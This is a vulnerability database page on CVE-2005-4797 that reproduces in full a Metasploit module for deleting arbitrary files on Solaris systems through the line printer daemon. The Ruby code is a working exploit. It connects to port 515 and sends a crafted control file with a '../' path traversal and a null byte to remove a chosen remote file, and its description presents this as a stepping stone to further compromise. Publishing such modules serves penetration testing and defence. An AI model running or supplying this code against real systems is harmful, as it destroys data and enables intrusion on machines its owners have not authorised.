Solaris LPD Arbitrary File Delete

🗓️ 31 Aug 2024 00:00:00Reported by H D Moore, Optyx, metasploit.comType

packetstorm🔗 packetstormsecurity.com👁 170 Views

Solaris LPD Arbitrary File Delete module exploits vulnerability in Solaris line printer daemon to delete arbitrary files. Tested on Solaris 2.6, 7, 8, 9, and 10.

Reporter	Title	Published	Views	Family All 14
Circl	CVE-2005-4797	29 May 201815:50	–	circl
Check Point Advisories	Sun Solaris printd Daemon Arbitrary File Deletion (CVE-2005-4797)	25 Oct 200900:00	–	checkpoint_advisories
CVE	CVE-2005-4797	5 May 200623:00	–	cve
Cvelist	CVE-2005-4797	5 May 200623:00	–	cvelist
Metasploit	Solaris LPD Arbitrary File Delete	18 Sep 200600:33	–	metasploit
NVD	CVE-2005-4797	31 Dec 200505:00	–	nvd
Tenable Nessus	Solaris 10 (sparc) : 120467-05	18 Aug 200500:00	–	nessus
Tenable Nessus	Solaris 10 (x86) : 120468-05	18 Aug 200500:00	–	nessus
Tenable Nessus	Solaris 7 (sparc) : 107115-20	12 Jul 200400:00	–	nessus
Tenable Nessus	Solaris 7 (x86) : 107116-20	12 Jul 200400:00	–	nessus

`##  
# This module requires Metasploit: https://metasploit.com/download  
# Current source: https://github.com/rapid7/metasploit-framework  
##  
  
class MetasploitModule < Msf::Auxiliary  
include Msf::Exploit::Remote::Tcp  
include Msf::Auxiliary::Dos  
  
def initialize(info = {})  
super(update_info(info,  
'Name' => 'Solaris LPD Arbitrary File Delete',  
'Description' => %q{  
This module uses a vulnerability in the Solaris line printer  
daemon to delete arbitrary files on an affected system. This  
can be used to exploit the rpc.walld format string flaw, the  
missing krb5.conf authentication bypass, or simply delete  
system files. Tested on Solaris 2.6, 7, 8, 9, and 10.  
  
},  
'Author' => [ 'hdm', 'Optyx <optyx[at]uberhax0r.net>' ],  
'License' => MSF_LICENSE,  
'References' =>  
[  
[ 'CVE', '2005-4797' ],  
[ 'BID', '14510' ],  
[ 'OSVDB', '18650' ]  
]  
))  
  
register_options(  
[  
Opt::RPORT(515),  
OptString.new('RPATH', [ true, "The remote file path to delete"]),  
])  
end  
  
def run  
  
  
r_hostname = Rex::Text.rand_text_alpha(rand(8)+1)  
r_user = Rex::Text.rand_text_alpha(rand(8)+1)  
r_spool = Rex::Text.rand_text_alpha(rand(8)+1)  
  
# Create a simple control file...  
control = "H#{r_hostname}\nP#{r_user}\n";  
  
# The job ID is squashed down to three decimal digits  
jid = ($$ % 1000).to_s + [Time.now.to_i].pack('N').unpack('H*')[0]  
  
# Establish the first connection to the server  
sock1 = connect(false)  
  
# Request a cascaded job  
sock1.put("\x02#{r_hostname}:#{r_spool}\n")  
res = sock1.get_once  
if (not res)  
print_status("The target did not accept our job request command")  
return  
end  
  
# Theoretically, we could delete multiple files at once, however  
# the lp daemon will append garbage from memory to the path name  
# if we don't stick a null byte after the path. Unfortunately, this  
# null byte will prevent the parser from processing the other paths.  
control << "U" + ("../" * 10) + "#{datastore['RPATH']}\x00\n"  
  
dataf = Rex::Text.rand_text_alpha(100)+1  
  
print_status("Deleting #{datastore['RPATH']}...")  
if !(  
send_file(sock1, 2, "cfA" + jid + r_hostname, control) and  
send_file(sock1, 3, "dfa" + jid + r_hostname, dataf)  
)  
sock1.close  
return  
end  
  
print_good("Successfully deleted #{datastore['RPATH']} >:-]")  
sock1.close  
end  
  
def send_file(s, type, name, data='')  
  
s.put(type.chr + data.length.to_s + " " + name + "\n")  
res = s.get_once(1)  
if !(res and res[0] == ?\0)  
print_status("The target did not accept our control file command (#{name})")  
return  
end  
  
s.put(data)  
s.put("\x00")  
res = s.get_once(1)  
if !(res and res[0] == ?\0)  
print_status("The target did not accept our control file data (#{name})")  
return  
end  
  
print_status(sprintf(" Uploaded %.4d bytes >> #{name}", data.length))  
return true  
end  
end  
`

31 Aug 2024 00:00Current

7High risk

Vulners AI Score7

CVSS 25

EPSS0.73269